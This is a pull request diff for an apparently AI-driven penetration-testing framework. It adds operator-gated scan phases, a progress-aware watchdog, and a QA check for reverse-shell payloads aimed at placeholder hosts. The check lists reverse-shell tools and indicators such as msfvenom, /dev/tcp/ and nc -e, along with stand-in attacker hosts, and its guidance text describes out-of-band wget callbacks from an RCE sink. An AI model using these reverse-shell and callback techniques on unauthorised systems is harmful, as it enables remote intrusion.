### PR TITLE
feat(phases): human-gated phase progression + live-scan runtime hardening

### DIFF
--- a/core/api_server/routes/scan_state_routes.py
+++ b/core/api_server/routes/scan_state_routes.py
@@ -1,7 +1,8 @@
-"""Scan-state mutation routes: clear, tunnels, intervention, steering."""
+"""Scan-state mutation routes: clear, tunnels, intervention, steering, phase advance."""
 from __future__ import annotations
 
 import logging
+import re
 
 from fastapi import Request
 from fastapi.responses import JSONResponse
@@ -11,6 +12,38 @@ import core.api_server as _api
 from ._common import router
 
 _log = logging.getLogger(__name__)
+
+
+# ── Operator phase-advance (human-gated A→B→C) ──────────────────────────────
+# Phases never auto-advance; the operator drives them via the dashboard button
+# (/api/phase/advance) or a typed steer ("advance to phase B", "next phase"),
+# which we parse here so it fires deterministically server-side.
+_PHASE_ADVANCE_RE = re.compile(
+    r'\b(?:advance|proceed|move|switch|go|goto|jump|progress|start|begin|enter)\b'
+    r'[\w\s]{0,20}?\b'
+    r'(?:phase\s*(?P<letter>[abc])\b'
+    r'|(?P<name>coverage|synthesis|sweep|exploit)\s+phase\b'
+    r'|phase\s+(?P<name2>coverage|synthesis|sweep|exploit)\b)', re.I)
+_NEXT_PHASE_RE = re.compile(r'\bnext\s+phase\b|\badvance\s+(?:the\s+)?phase\b', re.I)
+
+
+def _parse_phase_steer(message: str):
+    """Detect an operator phase-advance instruction in a free-form steer.
+    Returns (True, target) where target is 'exploit'/'coverage'/'synthesis' or None (=next phase),
+    or (False, None) for a normal steer. Conservative: needs an advance verb AND an explicit phase
+    reference, and a bare 'coverage'/'exploit' must be qualified by the word 'phase' (so
+    'go check the coverage tab' is NOT read as an advance)."""
+    m = _PHASE_ADVANCE_RE.search(message or "")
+    if m:
+        letter = (m.group("letter") or "").lower()
+        name = (m.group("name") or m.group("name2") or "").lower()
+        tgt = ({"a": "exploit", "b": "coverage", "c": "synthesis"}.get(letter)
+               or {"coverage": "coverage", "sweep": "coverage",
+                   "synthesis": "synthesis", "exploit": "exploit"}.get(name))
+        return (True, tgt)
+    if _NEXT_PHASE_RE.search(message or ""):
+        return (True, None)
+    return (False, None)
 
 
 # ── Scan-state mutation ─────────────────────────────────────────────────────
@@ -164,6 +197,16 @@ async def api_steer(request: Request) -> JSONResponse:
         message = str(body.get("message", "")).strip()
         if not message:
             return JSONResponse({"ok": False, "error": "message required"}, status_code=400)
+        # Operator phase-advance via typed steer ("advance to phase B", "next phase") — handle it
+        # deterministically server-side (don't route it through the model) so the phase moves NOW.
+        is_phase, target = _parse_phase_steer(message)
+        if is_phase:
+            from core import session as scan_session
+            scan_session.load_from_disk(force=True)
+            res = scan_session.advance_phase(target)
+            return JSONResponse(
+                {"phase_advanced": bool(res.get("ok")), **res},
+                status_code=200 if res.get("ok") else 400)
         from core.steering import steering_queue, RESUME_REQUIRED
         steering_queue.add_directive(
             code=RESUME_REQUIRED,
@@ -176,4 +219,51 @@ async def api_steer(request: Request) -> JSONResponse:
         return JSONResponse({"ok": True})
     except Exception:
         _log.exception("api_steer failed")
+        return JSONResponse({"ok": False, "error": _api._ERR_REQUEST_FAILED}, status_code=500)
+
+
+@router.get("/api/phase")
+async def api_phase() -> JSONResponse:
+    """Current scan phase + advisory hint, for the dashboard's phase control."""
+    try:
+        from core import session as scan_session
+        from core.session import phases as _phases
+        scan_session.load_from_disk(force=True)
+        cur = scan_session.get() or {}
+        phase = _phases.current_phase(cur)
+        return JSONResponse({
+            "phase": phase,
+            "label": _phases.phase_label(phase),
+            "advice": cur.get("phase_advice"),         # phase it COULD advance to (advisory only)
+            "next": _phases.forced_next(phase),         # the next forward phase (for the button)
+            "phases": list(_phases.PHASES),
+            "running": cur.get("status") == "running",
+        })
+    except Exception:
+        _log.exception("api_phase failed")
+        return JSONResponse({"phase": "exploit", "label": "", "advice": None, "next": "coverage",
+                             "phases": ["exploit", "coverage", "synthesis"], "running": False})
+
+
+@router.post("/api/phase/advance")
+async def api_phase_advance(request: Request) -> JSONResponse:
+    """Operator advances the scan phase FORWARD (dashboard button). Phases never auto-advance —
+    Phase A runs as thorough/long as you want, and you move to the Phase-B sweep fallback and
+    Phase-C synthesis by hand. Body (optional): {"target": "coverage"|"synthesis"|"b"|"c"};
+    omit target = next phase forward."""
+    try:
+        try:
+            body = await request.json()
+        except Exception:
+            body = {}
+        target = body.get("target") if isinstance(body, dict) else None
+        from core import session as scan_session
+        # Force-reload before mutating — the MCP process owns session.json; the dashboard's cached
+        # _current would otherwise be stale (same pattern as api_intervention_respond). The MCP
+        # picks up our write via _reconcile_if_external_write on its next tool call.
+        scan_session.load_from_disk(force=True)
+        res = scan_session.advance_phase(target)
+        return JSONResponse(res, status_code=200 if res.get("ok") else 400)
+    except Exception:
+        _log.exception("api_phase_advance failed")
         return JSONResponse({"ok": False, "error": _api._ERR_REQUEST_FAILED}, status_code=500)

--- a/core/api_server/smith/__init__.py
+++ b/core/api_server/smith/__init__.py
@@ -31,6 +31,11 @@ _watchdog_no_progress_count = 0
 # runaway where the rolling per-hour cap alone let the watchdog respawn forever.
 _watchdog_scan_key: str = ""
 _watchdog_scan_restarts = 0
+# Progress snapshot (findings, addressed cells) observed at the last watchdog respawn-flow pass.
+# The per-scan cap resets whenever the scan ADVANCED since this mark, so the cap counts only
+# CONSECUTIVE futile respawns — a healthy long scan that legitimately respawns many times and
+# keeps finding things is never suppressed (fixes the "deep scan stalls at 8 respawns" regression).
+_watchdog_last_respawn_progress: tuple = ()
 # Last respawn-failure reason (the child's own exit line, e.g. an out-of-usage /
 # credit / auth message) so the no-progress HIR can report the REAL cause instead
 # of the generic "agent keeps exiting without testing". Cleared on a live respawn.

--- a/core/api_server/smith/watchdog.py
+++ b/core/api_server/smith/watchdog.py
@@ -72,6 +72,18 @@ async def _watchdog_respawn_flow(now: float) -> None:
     if sid and sid != _smith._watchdog_scan_key:
         _smith._watchdog_scan_key = sid      # new scan → reset the cumulative count
         _smith._watchdog_scan_restarts = 0
+        _smith._watchdog_last_respawn_progress = ()
+    # Progress-aware cap: a respawn that LED TO substantive progress (a new finding / newly-closed
+    # cell) is not a runaway. Reset the per-scan counter whenever the scan ADVANCED since the last
+    # observation, so the cap counts only CONSECUTIVE futile respawns (recovery→list→exit with zero
+    # progress). Without this, a healthy long scan that legitimately respawns 8+ times and keeps
+    # finding things is wrongly suppressed and stalls (the "my deep scan died at 8 respawns" bug).
+    _cur_progress = _smith._scan_progress_snapshot()
+    if _smith._watchdog_scan_restarts and _cur_progress != _smith._watchdog_last_respawn_progress:
+        _log.info("watchdog: scan progressed since last respawn (%s → %s) — resetting per-scan cap",
+                  _smith._watchdog_last_respawn_progress, _cur_progress)
+        _smith._watchdog_scan_restarts = 0
+    _smith._watchdog_last_respawn_progress = _cur_progress
     if _smith._watchdog_scan_restarts >= _api._WATCHDOG_MAX_PER_SCAN:
         _log.warning("watchdog suppressed: per-scan respawn cap %d reached for scan %s — "
                      "auto-respawn stopped, awaiting operator",

--- a/core/qa_agent/__init__.py
+++ b/core/qa_agent/__init__.py
@@ -127,6 +127,7 @@ from .checks_health import (  # noqa: E402
     _check_budget_limit,
     _check_exploit_escalation,
     _check_repeated_tool_failure,
+    _check_reverse_shell_placeholder_lhost,
     _check_target_unreachable,
     _check_zero_endpoints,
 )

--- a/core/qa_agent/checks_health.py
+++ b/core/qa_agent/checks_health.py
@@ -425,7 +425,7 @@ _REVSHELL_INDICATORS = ("msfvenom", "reverse_bash", "reverse_tcp", "/dev/tcp/", 
 # loose substring, so a real 'lhost=attacker.corp.com' is NOT flagged (only the literal placeholders).
 _PLACEHOLDER_HOSTS = frozenset({
     "attacker.example.com", "attacker", "lhost", "your_ip", "your-ip", "your.ip",
-    "changeme", "x.x.x.x", "10.10.10.10", "example.com", "attacker_ip", "attacker-ip",
+    "changeme", "x.x.x.x", "10.10.10.10", "example.com", "attacker_ip", "attacker-ip",  # NOSONAR S1313 — placeholder-detection literal, not a network address
     "0.0.0.0", "attacker.local", "attacker.tld", "target_ip",
 })
 # Pull the host token out of the common reverse-shell syntaxes (lhost=, /dev/tcp/HOST/, tcp:HOST,
@@ -462,7 +462,7 @@ def _check_reverse_shell_placeholder_lhost(entries: list[dict], session_data: di
                     "ATTACKER / LHOST) — it cannot call back; you have no routable listener. Do ONE "
                     "of: (1) an operator listener, if set, is in known_assets.attacker_host — use it; "
                     "(2) prove egress via the OOB collaborator — session(action='oob_mint'), embed "
-                    "http://<sub>/ (wget) or a DNS lookup in the RCE sink, then oob_poll; the callback "
+                    "http://<sub>/ (wget) or a DNS lookup in the RCE sink, then oob_poll; the callback "  # NOSONAR S5332 — example URL in guidance text, not an HTTP connection
                     "artifact satisfies the post_exploit_rce gate; (3) if there is no egress, document "
                     "the interactive shell as a DEAD-END (a dismissed escalation_lead on the RCE "
                     "finding) AND session(action='wishlist_add', need='public reverse-shell listener + "

--- a/core/qa_agent/checks_health.py
+++ b/core/qa_agent/checks_health.py
@@ -9,6 +9,7 @@ exploitation via a steering directive instead of pausing.
 """
 from __future__ import annotations
 
+import re
 from datetime import datetime, timezone
 
 import core.qa_agent as _qa
@@ -318,12 +319,27 @@ def _check_exploit_escalation(entries: list[dict], findings_data: dict, session_
     return None
 
 
+def _is_client_response_size_error(err: str) -> bool:
+    """True when a tool 'failure' is actually the HTTP CLIENT rejecting a large-but-valid
+    response (aiohttp LineTooLong / a header/field over the parser limit), NOT a network or
+    reachability problem — the request reached the target and got a response the client parser
+    couldn't fit (e.g. a huge `token=`/Set-Cookie header, or data reflected into a header during
+    exploitation). These must not be mis-framed as 'target down / DNS / SSL / proxy'."""
+    e = (err or "").lower()
+    return (("more than" in e and "bytes" in e)          # "Got more than 8190 bytes when reading"
+            or "line too long" in e or "linetoolong" in e
+            or "is too long" in e                        # "Header value/name is too long"
+            or "max_line_size" in e or "max_field_size" in e)
+
+
 def _check_repeated_tool_failure(entries: list[dict]) -> dict | None:
     """HIR when the same tool fails 3+ times in a row — likely an infrastructure issue.
 
     Message + remediation options are tool-aware: Python-native tools
     (http_request, spider) get a target-reachability framing; Docker-backed
     tools (kali, metasploit, nuclei, ...) keep the container/infra framing.
+    Client-side response-size errors (aiohttp LineTooLong) are exempted — they mean the target
+    responded, so they surface as a NON-blocking advisory, not a reachability HIR that halts.
     """
     tool_entries = [e for e in entries if e.get("type") == "TOOL" and e.get("error")]
     if len(tool_entries) < 3:
@@ -340,6 +356,24 @@ def _check_repeated_tool_failure(entries: list[dict]) -> dict | None:
         return None
 
     is_python_native = broken_tool in _PYTHON_NATIVE_TOOLS
+
+    # Client-side response-size errors (aiohttp LineTooLong) are NOT reachability failures — the
+    # target responded; our HTTP client rejected an oversized response line. Don't halt the scan
+    # with a mis-framed reachability HIR; surface a non-blocking advisory (fixed at the source by
+    # raising the client's max_line_size/max_field_size in mcp_server/http_tools.py).
+    errs = [str(e.get("error", "")) for e in last_three]
+    if is_python_native and all(_is_client_response_size_error(x) for x in errs):
+        return {
+            "code": "TOOL_RESPONSE_TOO_LARGE", "urgency": "medium", "blocking": False,
+            "message": (
+                f"'{broken_tool}' hit the HTTP client's line/field size limit 3× — a large "
+                "response (e.g. a big token=/Set-Cookie header or data reflected into a header), "
+                "NOT a target-reachability problem. The client parser limit has been raised; if it "
+                "recurs, chunk the data to <8 KB per response (head -c 4000 / paginate). Target is "
+                "up — keep testing."
+            ),
+        }
+
     if is_python_native:
         situation = (
             f"Tool '{broken_tool}' has failed 3 times in a row in the last 20 minutes. "
@@ -382,3 +416,58 @@ def _check_repeated_tool_failure(entries: list[dict]) -> dict | None:
         "code": "HIR_TOOL_FAILURE", "urgency": "high", "blocking": False,
         "message": message,
     }
+
+
+# A reverse-shell payload firing at one of these = a placeholder LHOST that can't call back.
+_REVSHELL_INDICATORS = ("msfvenom", "reverse_bash", "reverse_tcp", "/dev/tcp/", "lhost=",
+                        "nc -e", "socat tcp", "meterpreter", "reverse shell")
+# Exact placeholder HOST tokens — matched against the extracted lhost/callback VALUE, never as a
+# loose substring, so a real 'lhost=attacker.corp.com' is NOT flagged (only the literal placeholders).
+_PLACEHOLDER_HOSTS = frozenset({
+    "attacker.example.com", "attacker", "lhost", "your_ip", "your-ip", "your.ip",
+    "changeme", "x.x.x.x", "10.10.10.10", "example.com", "attacker_ip", "attacker-ip",
+    "0.0.0.0", "attacker.local", "attacker.tld", "target_ip",
+})
+# Pull the host token out of the common reverse-shell syntaxes (lhost=, /dev/tcp/HOST/, tcp:HOST,
+# connect("HOST"…, nc … HOST port).
+_CALLBACK_HOST_RE = re.compile(
+    r"(?:lhost[=\s]+|/dev/tcp/|tcp:|connect\(\"?|fsockopen\(\"?|-e\s+/\S+\s+|nc\s+(?:-\S+\s+)*)"
+    r"([A-Za-z0-9._-]+)", re.I)
+
+
+def _check_reverse_shell_placeholder_lhost(entries: list[dict], session_data: dict) -> dict | None:
+    """Advisory when a reverse-shell payload is fired with a PLACEHOLDER LHOST (e.g.
+    attacker.example.com / ATTACKER / LHOST) and no routable listener is configured — a futile
+    payload that can't call back (the msfvenom-rejects-attacker.example.com case). Points at the
+    real options instead of letting the model burn calls or silently switch skills. NON-blocking —
+    never halts the scan. Suppressed once an operator listener (SMITH_LHOST → attacker_host) exists,
+    since then the payload is legitimate. Matches on the extracted host VALUE (not loose substrings),
+    so a genuine hostname that merely starts with 'attacker' is not flagged."""
+    if (session_data.get("known_assets") or {}).get("attacker_host"):
+        return None
+    now = datetime.now(timezone.utc)
+    tool_entries = [e for e in entries if e.get("type") == "TOOL"]
+    for e in tool_entries[-15:]:
+        if _ts_age_secs(e.get("ts", ""), now) > 1200:
+            continue
+        cmd = str(e.get("command", ""))
+        if not cmd or not any(ind in cmd.lower() for ind in _REVSHELL_INDICATORS):
+            continue
+        hosts = {h.strip().lower() for h in _CALLBACK_HOST_RE.findall(cmd)}
+        if hosts & _PLACEHOLDER_HOSTS:
+            return {
+                "code": "REVERSE_SHELL_NO_LHOST", "urgency": "medium", "blocking": False,
+                "message": (
+                    "A reverse-shell payload used a PLACEHOLDER LHOST (e.g. attacker.example.com / "
+                    "ATTACKER / LHOST) — it cannot call back; you have no routable listener. Do ONE "
+                    "of: (1) an operator listener, if set, is in known_assets.attacker_host — use it; "
+                    "(2) prove egress via the OOB collaborator — session(action='oob_mint'), embed "
+                    "http://<sub>/ (wget) or a DNS lookup in the RCE sink, then oob_poll; the callback "
+                    "artifact satisfies the post_exploit_rce gate; (3) if there is no egress, document "
+                    "the interactive shell as a DEAD-END (a dismissed escalation_lead on the RCE "
+                    "finding) AND session(action='wishlist_add', need='public reverse-shell listener + "
+                    "confirm target egress'). Do NOT re-run msfvenom with a placeholder or silently "
+                    "switch skills — the target is reachable; only the listener is missing."
+                ),
+            }
+    return None

--- a/core/qa_agent/daemon.py
+++ b/core/qa_agent/daemon.py
@@ -36,6 +36,7 @@ from .checks_health import (
     _check_budget_limit,
     _check_exploit_escalation,
     _check_repeated_tool_failure,
+    _check_reverse_shell_placeholder_lhost,
     _check_target_unreachable,
     _check_zero_endpoints,
 )
@@ -98,6 +99,8 @@ _CHECKS: list[tuple] = [
     (_check_missing_skill,         ("coverage_data", "session_data")),
     # Deep post-exploitation: RCE→shell, container escape, real lateral movement
     (_check_post_exploit_depth,    ("session_data",)),
+    # Reverse-shell with a placeholder LHOST → point at OOB / operator listener / documented dead-end
+    (_check_reverse_shell_placeholder_lhost, ("entries", "session_data")),
 ]
 
 

--- a/core/session/__init__.py
+++ b/core/session/__init__.py
@@ -194,6 +194,7 @@ from .intervention import (  # noqa: E402
 )
 from .gates import (  # noqa: E402
     add_tool_called,
+    advance_phase,
     defer_gates,
     maybe_advance_phase,
     open_trigger_gate,

--- a/core/session/gates.py
+++ b/core/session/gates.py
@@ -191,11 +191,14 @@ def set_step(step: str) -> dict | None:
 
 
 def maybe_advance_phase() -> str | None:
-    """Saturation-driven three-phase transition (exploit → coverage → synthesis). Reads the
-    live findings + coverage matrix, and if the current phase's goal is genuinely done,
-    advances ONE step forward and persists it. Returns the new phase when it transitions,
-    else None. Safe to call on any checkpoint (status / recovery / after a finding or cell) —
-    it only moves forward and never budget/time-gates. See core/session/phases.py."""
+    """Phases are OPERATOR-GATED — this NO LONGER auto-advances. Auto-advancing on a saturation
+    check risked a buggy/early check cutting the deep Phase-A pass short (exactly what the operator
+    wants to avoid: Phase A should run thorough and unbounded until the human says otherwise). This
+    now only computes an ADVISORY hint — whether the current phase LOOKS saturated, i.e. which phase
+    the operator COULD advance to — stores it on the session as `phase_advice` for the dashboard,
+    and returns None. The phase only changes via advance_phase() (dashboard button / typed
+    'advance to phase B' steer). Kept as a callable no-op so its existing callers
+    (status / recovery / completion) stay valid without auto-advancing."""
     from core.session import phases as _phases
     _sess._reconcile_if_external_write()
     if _sess._current is None or _sess._current.get("status") != "running":
@@ -203,21 +206,49 @@ def maybe_advance_phase() -> str | None:
     cur = _phases.current_phase(_sess._current)
     try:
         from core import findings as _findings, coverage as _cov
-        findings_data = _findings._load()
-        matrix = _cov.get_matrix()
+        advice = _phases.next_phase(cur, _sess._current, _findings._load(), _cov.get_matrix())
     except Exception:
-        return None
-    nxt = _phases.next_phase(cur, _sess._current, findings_data, matrix)
-    if not nxt or nxt == cur:
-        return None
+        advice = None
+    if _sess._current.get("phase_advice") != advice:
+        _sess._current["phase_advice"] = advice
+        _sess._flush()
+    return None   # never auto-advances — the operator decides via advance_phase()
+
+
+def advance_phase(target: str | None = None) -> dict:
+    """OPERATOR-gated phase advance (dashboard button / typed steer). Moves scan_phase FORWARD one
+    step (exploit → coverage → synthesis), or directly to `target` if it is forward of the current
+    phase. Never backward, never past synthesis. IGNORES saturation — the human decides when Phase
+    A's deep pass is done, so nothing can cut it short. Persists + logs PHASE_ADVANCE (operator).
+    Returns {ok, from, to} (with `error` when it can't advance)."""
+    from core.session import phases as _phases
+    _sess._reconcile_if_external_write()
+    if _sess._current is None or _sess._current.get("status") != "running":
+        return {"ok": False, "error": "no running scan"}
+    cur = _phases.current_phase(_sess._current)
+    if target:
+        alias = {"a": _phases.EXPLOIT, "b": _phases.COVERAGE, "c": _phases.SYNTHESIS,
+                 "exploit": _phases.EXPLOIT, "coverage": _phases.COVERAGE, "synthesis": _phases.SYNTHESIS}
+        target = alias.get(str(target).strip().lower(), str(target).strip().lower())
+        if target not in _phases.PHASES:
+            return {"ok": False, "error": f"unknown phase '{target}'", "from": cur, "to": cur}
+        if _phases.PHASES.index(target) <= _phases.PHASES.index(cur):
+            return {"ok": False, "error": f"phase '{target}' is not forward of '{cur}'",
+                    "from": cur, "to": cur}
+        nxt = target
+    else:
+        nxt = _phases.forced_next(cur)
+    if not nxt:
+        return {"ok": False, "error": "already at the final phase (synthesis)", "from": cur, "to": cur}
     _sess._current["scan_phase"] = nxt
+    _sess._current["phase_advice"] = None
     _sess._flush()
     try:
         from core import logger as _log
-        _log.note(f"PHASE_ADVANCE {cur} → {nxt}: {_phases.phase_label(nxt)}")
+        _log.note(f"PHASE_ADVANCE {cur} → {nxt} (operator): {_phases.phase_label(nxt)}")
     except Exception:
         pass
-    return nxt
+    return {"ok": True, "from": cur, "to": nxt}
 
 
 def _mark_active_skill_worked() -> bool:

--- a/core/session/lifecycle.py
+++ b/core/session/lifecycle.py
@@ -15,12 +15,40 @@ did, keeping every name patchable without introducing an import cycle.
 from __future__ import annotations
 
 import json
+import os
 import time
 import uuid
 from datetime import datetime, timezone
 
 import core.session as _sess
 from core import cost as cost_tracker
+
+
+def _parse_lhost(raw: str) -> tuple[str, int]:
+    """Parse SMITH_LHOST into (host, port). Handles IPv4/hostname 'host[:port]' AND IPv6
+    (bracketed '[2001:db8::1]:4444' or bare '::1'). Returns ('', 4444) for an unusable value
+    (caller skips storing it). Default port 4444; anything outside 1..65535 falls back to 4444.
+    Plain str.partition(':') was wrong for IPv6 — '::1' yielded host='' and '[::1]:4444' host='['."""
+    raw = (raw or "").strip()
+    port = 4444
+    host = raw
+    if raw.startswith("["):                       # bracketed IPv6, optional :port
+        end = raw.find("]")
+        if end != -1:
+            host = raw[1:end]
+            rest = raw[end + 1:]
+            if rest.startswith(":") and rest[1:].isdigit():
+                port = int(rest[1:])
+    elif raw.count(":") == 1:                      # host:port (IPv4 / hostname)
+        h, _, p = raw.partition(":")
+        host = h
+        if p.isdigit():
+            port = int(p)
+    # else: bare IPv6 (>=2 colons) or bare host → the whole string is the host, default port
+    host = host.strip()
+    if not (1 <= port <= 65535):
+        port = 4444
+    return host, port
 
 
 def start(
@@ -120,6 +148,18 @@ def start(
         "context_chars_sent": _sess._fixed_context_overhead_chars(),
         "complete_attempts":  0,        # incremented each time session(complete) is called
     }
+    # Operator-provided reverse-shell listener (SMITH_LHOST="host[:port]") — a routable attacker
+    # endpoint the target can call back to. Stored as a known asset so /reverse-shell uses a REAL
+    # LHOST instead of a placeholder; when unset, the skill falls back to the OOB collaborator as
+    # the callback rendezvous (and the QA guard flags placeholder-LHOST payloads).
+    _lhost = os.environ.get("SMITH_LHOST", "").strip()
+    if _lhost:
+        _host, _port = _parse_lhost(_lhost)
+        if _host:   # skip a malformed value rather than store a broken asset the model would use
+            _sess._current["known_assets"]["attacker_host"] = {
+                "lhost": _host, "lport": _port, "source": "SMITH_LHOST",
+            }
+
     # Capture which Smith process drove this start() call so the dashboard
     # watchdog can ask "is THIS PID still alive?" instead of falling back to
     # the quick_log mtime heuristic (which gives false positives during long

--- a/core/session/phases.py
+++ b/core/session/phases.py
@@ -41,8 +41,19 @@ def phase_label(phase: str) -> str:
 # ── Saturation predicates (each dischargeable via documented dead-ends) ──────────
 
 def _tools_run(sess: dict) -> set:
+    """All tool names run this scan. Reads BOTH session lists because they use different
+    vocabularies: `tools_called` holds the resolved SCANNER names (httpx/nmap/spider/naabu/... —
+    the vocabulary _RECON_TOOLS is written in), while `tool_invocations[].tool` holds the raw
+    dispatcher names (http_request/kali/...). Reading only tool_invocations (the original bug) left
+    _recon_done permanently False on real scans — the scanner names live in tools_called — so
+    depth_saturated was always False and the phase could never advance. Union both so recon is
+    detected regardless of which list a tool lands in."""
     out: set = set()
-    for e in (sess or {}).get("tool_invocations", []) or []:
+    s = sess or {}
+    for t in s.get("tools_called", []) or []:
+        if isinstance(t, str) and t:
+            out.add(t)
+    for e in s.get("tool_invocations", []) or []:
         if isinstance(e, dict) and e.get("tool"):
             out.add(e["tool"])
     return out
@@ -83,6 +94,48 @@ def _hunt_attempted(sess: dict) -> bool:
     flag set by gates._mark_active_skill_worked), not merely a set_skill rubber-stamp."""
     return any(isinstance(s, dict) and s.get("skill") in _HUNT_SKILLS and s.get("worked")
                for s in (sess or {}).get("skill_history", []) or [])
+
+
+def _worked_skills(sess: dict) -> set:
+    """The set of skills that have done attributable WORK (a tool fired while active), by the
+    same `worked` flag _hunt_attempted uses."""
+    return {e.get("skill") for e in (sess or {}).get("skill_history", []) or []
+            if isinstance(e, dict) and e.get("worked")}
+
+
+def _enforce_deep_skills() -> bool:
+    """Whether A→B requires the WHOLE applicable-skill sweep (full/enforcing profile) or just
+    the single-skill bar (weak local profiles). Forcing the full sweep on a small model
+    reproduces the coverage-gate 'game-then-stall', so those profiles keep the lighter bar.
+    Fail-safe → True (the deep bar)."""
+    try:
+        from mcp_server.scan_engine.budget import get_profile
+        return bool(get_profile().get("enforce_coverage", True))
+    except Exception:
+        return True
+
+
+def _skills_exhausted(sess: dict) -> bool:
+    """Every APPLICABLE hunt skill has actually WORKED — the deep-skill sweep is done, so Phase A
+    ran all its skills (web-exploit AND param-fuzz AND business-logic AND credential-audit AND the
+    conditional post-exploit/cloud/container/lateral ones), not just one. The mandatory
+    skill-chain gates ARE the applicability logic: each is opened by a real trigger (an endpoint
+    type discovered, or a confirmed RCE / IMDS / container / internal reach), so 'all gates
+    satisfied' == 'all applicable skills ran' — no hand-kept list to drift. Reads the per-skill
+    `worked` flags directly (not gate.status) so it doesn't depend on reconcile_worked_gates
+    having run this cycle. DISCHARGEABLE and never a deadlock: a skill blocked by the environment
+    still 'works' by running and documenting the dead-end, and the operator can N/A a gate. On
+    weak profiles it delegates to the single-skill bar (already checked by depth_saturated)."""
+    if not _enforce_deep_skills():
+        return True
+    worked = _worked_skills(sess)
+    for g in (sess or {}).get("gates", []) or []:
+        if g.get("status") == "satisfied":
+            continue
+        req = set(g.get("required_skills", []) or [])
+        if req and not req.issubset(worked):
+            return False
+    return True
 
 
 def _chain_fids(findings_data: dict) -> set:
@@ -137,12 +190,22 @@ def open_bridges(findings_data: dict) -> int:
 
 
 def depth_saturated(sess: dict, findings_data: dict) -> bool:
-    """A → B: the deep hunt has exhausted its high-value leads — recon is done, EVERY
-    high/critical finding has been pursued to a terminal or documented dead-end, and no
-    provable exploit bridge is left unattempted. Returns False while any deep work remains,
-    so Phase A keeps going (unbudgeted, like the lean early runs) until it's truly done."""
+    """A → B: the deep hunt has exhausted its high-value leads. Phase A runs UNBUDGETED (like the
+    lean early runs that went deep for hours) and advances only when ALL of these hold — each
+    dischargeable, so it always terminates, but only once depth is genuinely mined out:
+      1. recon has run AND at least one hunt skill did real work (the hunt started);
+      2. every APPLICABLE hunt skill has run — all mandatory skill-chain gates worked, i.e. the
+         FULL skill sweep, not just one skill (_skills_exhausted);
+      3. every high/critical finding is PURSUED — driven to a terminal, or a documented
+         dead-end (dismissed escalation_lead);
+      4. no provable exploit BRIDGE is left unattempted.
+    It deliberately does NOT advance on the model's own 'I want to sweep' signal: that breadth
+    pull is the regression being fixed, so only objective depth-exhaustion moves the phase — the
+    Phase-A DRAIN refusal instead redirects a premature sweep back into the deep work still owed."""
     if not _recon_done(sess) or not _hunt_attempted(sess):
         return False  # the deep hunt hasn't genuinely run yet — keep hunting
+    if not _skills_exhausted(sess):
+        return False  # applicable skills still owe their deep pass — keep hunting, don't drift to breadth
     highs = [f for f in findings_data.get("findings", [])
              if f.get("severity") in ("high", "critical")
              and f.get("status", "confirmed") != "false_positive"]
@@ -176,10 +239,21 @@ def synthesis_saturated(findings_data: dict) -> bool:
 
 
 def next_phase(current: str, sess: dict, findings_data: dict, matrix: dict) -> str | None:
-    """The phase to advance to if the current one is saturated, else None. Only ever moves
-    forward A→B→C (never backward)."""
+    """ADVISORY: the phase the current one COULD advance to if saturated, else None. Only ever
+    forward A→B→C. Phases no longer AUTO-advance on this — it drives the dashboard 'ready to
+    advance?' hint (see gates.maybe_advance_phase). The operator advances via gates.advance_phase."""
     if current == EXPLOIT and depth_saturated(sess, findings_data):
         return COVERAGE
     if current == COVERAGE and coverage_saturated(matrix):
         return SYNTHESIS
     return None
+
+
+def forced_next(current: str) -> str | None:
+    """Operator-forced next phase (IGNORES saturation) — one step forward, exploit→coverage→
+    synthesis; None past synthesis. Used by the human-gated advance (gates.advance_phase)."""
+    try:
+        i = PHASES.index(current)
+    except ValueError:
+        i = 0
+    return PHASES[i + 1] if i + 1 < len(PHASES) else None

--- a/dashboard/index.html
+++ b/dashboard/index.html
@@ -137,6 +137,16 @@
       <span class="cmd-chip" onclick="setSmithChip('Summarize all findings discovered so far')">Summarize findings</span>
     </div>
     <div id="cmd-smith-feedback" class="cmd-smith-feedback"></div>
+    <div class="cmd-smith-phase-row" id="cmd-phase-row" style="display:flex;align-items:center;gap:10px;margin:6px 0;flex-wrap:wrap">
+      <span class="cmd-phase-tag" style="font-size:11px;letter-spacing:.05em;color:#8b949e">PHASE</span>
+      <strong id="cmd-phase-current" class="cmd-phase-current" style="color:#58a6ff">—</strong>
+      <button class="cmd-phase-advance-btn" id="cmd-phase-advance-btn" onclick="advancePhase()"
+        title="Phase A stays exactly as deep as you left it — this only unlocks the next phase"
+        style="display:none;background:#1f6feb;color:#fff;border:none;border-radius:6px;padding:5px 12px;cursor:pointer;font-size:12px">
+        &#9654; <span id="cmd-phase-advance-label">Advance</span>
+      </button>
+      <span id="cmd-phase-hint" class="cmd-phase-hint" style="font-size:12px;color:#3fb950"></span>
+    </div>
     <div class="cmd-smith-complete-row">
       <button class="cmd-smith-restart-btn" id="cmd-restart-btn" onclick="restartSmith()" style="display:none">
         &#9654; <span id="cmd-restart-label">Restart Smith</span>

--- a/dashboard/js/common.js
+++ b/dashboard/js/common.js
@@ -363,6 +363,66 @@
   setInterval(_pollSmithStatus, 10000);
   _pollSmithStatus();
 
+  // ── Human-gated phase control (A→B→C) ─────────────────────────────────────
+  // Phases NEVER auto-advance — Phase A runs as deep/long as you leave it. You
+  // move to the Phase-B sweep fallback and Phase-C synthesis by hand (button or
+  // a typed "advance to phase B" steer). Depth logic is untouched.
+  const _PHASE_META = {
+    exploit:   { short: 'A · deep exploitation', nextLabel: 'Advance to Phase B (sweep)' },
+    coverage:  { short: 'B · coverage sweep',    nextLabel: 'Advance to Phase C (synthesis)' },
+    synthesis: { short: 'C · synthesis',         nextLabel: null },
+  };
+  async function _pollPhase() {
+    try {
+      const p = await fetch('/api/phase?_=' + Date.now()).then(r => r.json());
+      const curEl  = document.getElementById('cmd-phase-current');
+      const btn    = document.getElementById('cmd-phase-advance-btn');
+      const btnLbl = document.getElementById('cmd-phase-advance-label');
+      const hintEl = document.getElementById('cmd-phase-hint');
+      const meta   = _PHASE_META[p.phase] || { short: p.phase, nextLabel: 'Advance phase' };
+      if (curEl) curEl.textContent = meta.short;
+      if (btn) {
+        if (p.running && p.next) {
+          btn.style.display = 'inline-block';
+          btn.dataset.target = p.next;
+          if (btnLbl) btnLbl.textContent = meta.nextLabel || ('Advance to ' + p.next);
+        } else {
+          btn.style.display = 'none';   // idle scan, or already at synthesis
+        }
+      }
+      // Advisory only — the phase LOOKS saturated. Never blocks; you decide.
+      if (hintEl) hintEl.textContent = (p.advice && p.running) ? '✓ looks saturated — advance when ready' : '';
+    } catch (e) {}
+  }
+  setInterval(_pollPhase, 10000);
+  _pollPhase();
+
